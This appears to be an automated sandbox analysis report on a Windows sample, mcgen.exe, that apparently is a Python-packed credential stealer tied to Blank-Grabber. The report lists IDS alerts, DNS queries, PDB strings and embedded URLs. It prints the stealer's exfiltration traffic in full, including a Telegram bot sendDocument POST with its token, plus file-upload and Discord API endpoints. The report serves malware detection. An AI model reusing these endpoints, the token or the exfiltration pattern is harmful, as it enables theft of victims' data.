              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: mcgen.exe, 00000002.00000002.2533576482.00007FFD93F42000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: mcgen.exe, 00000000.00000003.2120621510.0000024512160000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000002.2539430082.00007FFDAC064000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
              Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: mcgen.exe, mcgen.exe, 00000002.00000002.2534899570.00007FFD940D1000.00000040.00000001.01000000.0000000B.sdmp
              Source: Binary string: D:\a\1\b\libcrypto-3.pdb source: mcgen.exe, mcgen.exe, 00000002.00000002.2533576482.00007FFD93FDA000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: :C:\Users\user\AppData\Local\Temp\ppw2wipr\ppw2wipr.pdb source: powershell.exe, 0000003E.00000002.2321464313.000001FC3F123000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmp, rar.exe, 00000067.00000000.2410225338.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: mcgen.exe, 00000002.00000002.2538780635.00007FFDA5491000.00000040.00000001.01000000.0000000D.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: mcgen.exe, 00000002.00000002.2537613494.00007FFDA34F1000.00000040.00000001.01000000.00000006.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: mcgen.exe, 00000002.00000002.2537894188.00007FFDA3A81000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WA source: mcgen.exe
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: mcgen.exe, 00000002.00000002.2537371109.00007FFDA349B000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: mcgen.exe, 00000002.00000002.2538594297.00007FFDA4DA1000.00000040.00000001.01000000.00000012.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: mcgen.exe, 00000002.00000002.2537371109.00007FFDA349B000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: mcgen.exe, 00000002.00000002.2538398509.00007FFDA4161000.00000040.00000001.01000000.00000009.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: mcgen.exe, 00000002.00000002.2538121541.00007FFDA3AE1000.00000040.00000001.01000000.0000000C.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: mcgen.exe, 00000002.00000002.2537138652.00007FFDA3451000.00000040.00000001.01000000.0000000A.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\python313.pdb source: mcgen.exe, 00000002.00000002.2535253168.00007FFD94659000.00000040.00000001.01000000.00000004.sdmp
              Source: Binary string: D:\a\1\b\libssl-3.pdb source: mcgen.exe, mcgen.exe, 00000002.00000002.2536395323.00007FFDA33C5000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: mcgen.exe, 00000002.00000002.2536860815.00007FFDA3411000.00000040.00000001.01000000.0000000E.sdmp
              Source: C:\Users\user\Desktop\mcgen.exeCode function: 0_2_00007FF6B9F183B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF6B9F183B0
              Source: C:\Users\user\Desktop\mcgen.exeCode function: 0_2_00007FF6B9F192F0 FindFirstFileExW,FindClose,0_2_00007FF6B9F192F0
              Source: C:\Users\user\Desktop\mcgen.exeCode function: 0_2_00007FF6B9F318E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF6B9F318E4
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695CF46EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,103_2_00007FF695CF46EC
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695D388E0 FindFirstFileExA,103_2_00007FF695D388E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695CEE21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,103_2_00007FF695CEE21C

              Networking

              barindex
              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:49894 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2857751 - Severity 1 - ETPRO MALWARE SynthIndi Loader Exfiltration Activity (POST) : 192.168.2.6:49894 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2857752 - Severity 1 - ETPRO MALWARE SynthIndi Loader CnC Response : 149.154.167.220:443 -> 192.168.2.6:49894
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 3
              Source: unknownDNS query: name: api.telegram.org
              Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
              Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
              Source: unknownDNS query: name: ip-api.com
              Source: unknownDNS query: name: ip-api.com
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.3.0
              Source: global trafficHTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.3.0
              Source: mcgen.exe, 00000002.00000002.2529086772.000002C54F0D4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: mcgen.exe, 00000002.00000002.2529086772.000002C54F0D4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)
              Source: global trafficDNS traffic detected: DNS query: blank-q0y5l.in
              Source: global trafficDNS traffic detected: DNS query: ip-api.com
              Source: global trafficDNS traffic detected: DNS query: api.telegram.org
              Source: unknownHTTP traffic detected: POST /bot7770343182:AAFH0EKMbwNwFcAUN5qW8m0OzxUEjm5sVvs/sendDocument HTTP/1.1Host: api.telegram.orgAccept-Encoding: identityContent-Length: 727365User-Agent: python-urllib3/2.3.0Content-Type: multipart/form-data; boundary=15fc0aba29de58fbc6372618a4a7a3b7
              Source: mcgen.exe, 00000000.00000003.2123286342.0000024512160000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digi
              Source: mcgen.exe, 00000000.00000003.2123286342.0000024512160000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digi6
              Source: mcgen.exe, 00000000.00000003.2123373065.0000024512160000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000000.00000003.2123286342.0000024512160000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000000.00000003.2122893326.0000024512160000.00000004.00000020.00020000.00000000.sdmp, libffi-8.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: mcgen.exe, 00000000.00000003.2123373065.0000024512160000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000000.00000003.2123286342.0000024512160000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000000.00000003.2122893326.0000024512160000.00000004.00000020.00020000.00000000.sdmp, libffi-8.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
              Source: mcgen.exe, 00000000.00000003.2123373065.0000024512160000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000000.00000003.2123286342.0000024512160000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000000.00000003.2122893326.0000024512160000.00000004.00000020.00020000.00000000.sdmp, libffi-8.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: mcgen.exe, 00000000.00000003.2123373065.0000024512160000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000000.00000003.2123286342.0000024512160000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000000.00000003.2122893326.0000024512160000.00000004.00000020.00020000.00000000.sdmp, libffi-8.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: mcgen.exe, 00000002.00000003.2248894895.000002C54EA53000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000002.2527033643.000002C54EA53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/
              Source: mcgen.exe, 00000000.00000003.2124193353.0000024512160000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
              Source: mcgen.exe, 00000002.00000002.2527940575.000002C54EA99000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000002.2525115429.000002C54C787000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000002.2527033643.000002C54E9A7000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000002.2526365039.000002C54E3D0000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000002.2527033643.000002C54E7D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2294771166.0000020A5B630000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.2396696364.000001FC55B20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
              Source: powershell.exe, 0000000B.00000002.2303077400.0000020A5B9AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
              Source: powershell.exe, 0000000B.00000002.2303077400.0000020A5B9AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micft.cMicRosof
              Source: powershell.exe, 0000003E.00000002.2398861499.000001FC55CF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
              Source: mcgen.exe, 00000000.00000003.2124193353.0000024512160000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
              Source: mcgen.exe, 00000000.00000003.2124193353.0000024512160000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
              Source: mcgen.exe, 00000000.00000003.2123373065.0000024512160000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000000.00000003.2123286342.0000024512160000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000000.00000003.2122893326.0000024512160000.00000004.00000020.00020000.00000000.sdmp, libffi-8.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: mcgen.exe, 00000000.00000003.2123373065.0000024512160000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000000.00000003.2123286342.0000024512160000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000000.00000003.2122893326.0000024512160000.00000004.00000020.00020000.00000000.sdmp, libffi-8.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
              Source: mcgen.exe, 00000000.00000003.2123373065.0000024512160000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000000.00000003.2123286342.0000024512160000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000000.00000003.2122893326.0000024512160000.00000004.00000020.00020000.00000000.sdmp, libffi-8.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: libffi-8.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: mcgen.exe, 00000000.00000003.2123373065.0000024512160000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000000.00000003.2123286342.0000024512160000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000000.00000003.2122893326.0000024512160000.00000004.00000020.00020000.00000000.sdmp, libffi-8.dll.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
              Source: mcgen.exe, 00000000.00000003.2124193353.0000024512160000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
              Source: mcgen.exe, 00000002.00000003.2139230293.000002C54E45D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf);
              Source: mcgen.exe, 00000002.00000002.2527033643.000002C54E950000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/
              Source: mcgen.exe, 00000002.00000002.2527033643.000002C54E9A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/mail/
              Source: mcgen.exe, 00000002.00000002.2527033643.000002C54E9A7000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000002.2527033643.000002C54E970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
              Source: mcgen.exe, 00000002.00000002.2526906103.000002C54E6D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/?fields=225545
              Source: mcgen.exe, 00000002.00000003.2141893180.000002C54E540000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2141838934.000002C54E522000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/?fields=225545r
              Source: mcgen.exe, 00000002.00000002.2526906103.000002C54E6D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
              Source: mcgen.exe, 00000002.00000003.2141893180.000002C54E540000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2141838934.000002C54E522000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hostingr
              Source: powershell.exe, 0000000B.00000002.2277416389.0000020A53250000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.2321464313.000001FC3F48A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.2390633772.000001FC4DB97000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.2390633772.000001FC4DCD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: mcgen.exe, 00000000.00000003.2124193353.0000024512160000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
              Source: mcgen.exe, 00000000.00000003.2123373065.0000024512160000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000000.00000003.2123286342.0000024512160000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000000.00000003.2122893326.0000024512160000.00000004.00000020.00020000.00000000.sdmp, libffi-8.dll.0.drString found in binary or memory: http://ocsp.digicert.com0
              Source: mcgen.exe, 00000000.00000003.2123373065.0000024512160000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000000.00000003.2123286342.0000024512160000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000000.00000003.2122893326.0000024512160000.00000004.00000020.00020000.00000000.sdmp, libffi-8.dll.0.drString found in binary or memory: http://ocsp.digicert.com0A
              Source: mcgen.exe, 00000000.00000003.2123373065.0000024512160000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000000.00000003.2123286342.0000024512160000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000000.00000003.2122893326.0000024512160000.00000004.00000020.00020000.00000000.sdmp, libffi-8.dll.0.drString found in binary or memory: http://ocsp.digicert.com0C
              Source: mcgen.exe, 00000000.00000003.2123373065.0000024512160000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000000.00000003.2123286342.0000024512160000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000000.00000003.2122893326.0000024512160000.00000004.00000020.00020000.00000000.sdmp, libffi-8.dll.0.drString found in binary or memory: http://ocsp.digicert.com0X
              Source: mcgen.exe, 00000000.00000003.2124193353.0000024512160000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
              Source: mcgen.exe, 00000000.00000003.2124193353.0000024512160000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
              Source: powershell.exe, 0000003E.00000002.2321464313.000001FC3F404000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: mcgen.exe, 00000000.00000003.2124193353.0000024512160000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcb.com/universal-root.crl0
              Source: mcgen.exe, 00000000.00000003.2124193353.0000024512160000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcd.com06
              Source: powershell.exe, 0000000B.00000002.2207068947.0000020A4340A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: powershell.exe, 0000000B.00000002.2207068947.0000020A431E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.2321464313.000001FC3DB21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 0000000B.00000002.2207068947.0000020A4340A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
              Source: mcgen.exe, 00000002.00000002.2528946211.000002C54EF54000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
              Source: mcgen.exe, 00000000.00000003.2124193353.0000024512160000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
              Source: mcgen.exe, 00000000.00000003.2124193353.0000024512160000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
              Source: mcgen.exe, 00000000.00000003.2124193353.0000024512160000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
              Source: mcgen.exe, 00000000.00000003.2124193353.0000024512160000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
              Source: mcgen.exe, 00000000.00000003.2124193353.0000024512160000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
              Source: mcgen.exe, 00000000.00000003.2124193353.0000024512160000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
              Source: powershell.exe, 0000003E.00000002.2321464313.000001FC3F289000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
              Source: powershell.exe, 0000003E.00000002.2321464313.000001FC3F404000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: mcgen.exe, 00000000.00000003.2123373065.0000024512160000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000000.00000003.2123286342.0000024512160000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000000.00000003.2122893326.0000024512160000.00000004.00000020.00020000.00000000.sdmp, libffi-8.dll.0.drString found in binary or memory: http://www.digicert.com/CPS0
              Source: mcgen.exe, 00000002.00000002.2525937902.000002C54E190000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
              Source: powershell.exe, 0000000B.00000002.2303077400.0000020A5B9AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
              Source: mcgen.exe, 00000002.00000002.2529086772.000002C54F120000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://MD8.mozilla.org/1/m
              Source: mcgen.exe, 00000002.00000003.2406611412.000002C54FADA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: mcgen.exe, 00000002.00000002.2529086772.000002C54F120000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://account.bellmedia.c
              Source: powershell.exe, 0000000B.00000002.2207068947.0000020A431E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.2321464313.000001FC3DB21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: mcgen.exe, 00000002.00000002.2529086772.000002C54F120000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://allegro.pl/
              Source: mcgen.exe, 00000002.00000002.2526906103.000002C54E6D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.anonfiles.com/upload
              Source: mcgen.exe, 00000002.00000003.2141893180.000002C54E540000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2141838934.000002C54E522000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.anonfiles.com/uploadr%
              Source: mcgen.exe, 00000002.00000002.2526906103.000002C54E6D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServer
              Source: mcgen.exe, 00000002.00000003.2141893180.000002C54E540000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2141838934.000002C54E522000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServerr
              Source: mcgen.exe, 00000002.00000002.2526906103.000002C54E6D0000.00000004.00001000.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2141838934.000002C54E522000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
              Source: mcgen.exe, 00000002.00000002.2529086772.000002C54F0D4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7770343182:AAFH0EKMbwNwFcAUN5qW8m0OzxUEjm5sVvs/sendDocument
              Source: mcgen.exe, 00000002.00000002.2529086772.000002C54F0D4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7770343182:AAFH0EKMbwNwFcAUN5qW8m0OzxUEjm5sVvs/sendDocument0
              Source: mcgen.exe, 00000002.00000002.2529086772.000002C54F120000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mo
              Source: mcgen.exe, 00000002.00000003.2406611412.000002C54FADA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: mcgen.exe, 00000002.00000003.2406611412.000002C54FADA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: mcgen.exe, 00000002.00000003.2406611412.000002C54FADA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: powershell.exe, 0000003E.00000002.2390633772.000001FC4DCD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 0000003E.00000002.2390633772.000001FC4DCD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 0000003E.00000002.2390633772.000001FC4DCD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: mcgen.exe, 00000000.00000003.2124193353.0000024512160000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
              Source: mcgen.exe, 00000000.00000003.2124193353.0000024512160000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
              Source: mcgen.exe, 00000000.00000003.2124193353.0000024512160000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0.
              Source: mcgen.exe, 00000002.00000003.2141838934.000002C54E522000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/users/
              Source: mcgen.exe, 00000002.00000002.2526906103.000002C54E6D0000.00000004.00001000.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2141838934.000002C54E522000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com/api/v9/users/
              Source: mcgen.exe, 00000002.00000002.2525937902.000002C54E1F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
              Source: mcgen.exe, 00000002.00000002.2526754701.000002C54E5D0000.00000004.00001000.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2129375159.000002C54E217000.00000004.00000020.00020000.00000000.sdmp, base_library.zip.0.drString found in binary or memory: https://docs.python.org/3/howto/mro.html.
              Source: mcgen.exe, 00000002.00000002.2525383234.000002C54DF90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename
              Source: mcgen.exe, 00000002.00000002.2525383234.000002C54DF90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code
              Source: mcgen.exe, 00000002.00000002.2525383234.000002C54E014000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source
              Source: mcgen.exe, 00000002.00000002.2525383234.000002C54DF90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.is_package
              Source: mcgen.exe, 00000002.00000002.2525383234.000002C54E014000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.create_module
              Source: mcgen.exe, 00000002.00000002.2525383234.000002C54DF90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module
              Source: mcgen.exe, 00000002.00000002.2525383234.000002C54DF90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches
              Source: mcgen.exe, 00000002.00000002.2525383234.000002C54DF90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec
              Source: mcgen.exe, 00000002.00000002.2525937902.000002C54E190000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data
              Source: mcgen.exe, 00000002.00000003.2406611412.000002C54FADA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: mcgen.exe, 00000002.00000003.2406611412.000002C54FADA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: mcgen.exe, 00000002.00000003.2406611412.000002C54FADA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: mcgen.exe, 00000002.00000002.2528733144.000002C54ED10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3539
              Source: mcgen.exe, 00000002.00000002.2526906103.000002C54E6D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/Blank-Grabber
              Source: mcgen.exe, 00000002.00000003.2141893180.000002C54E540000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2141838934.000002C54E522000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/Blank-Grabberi
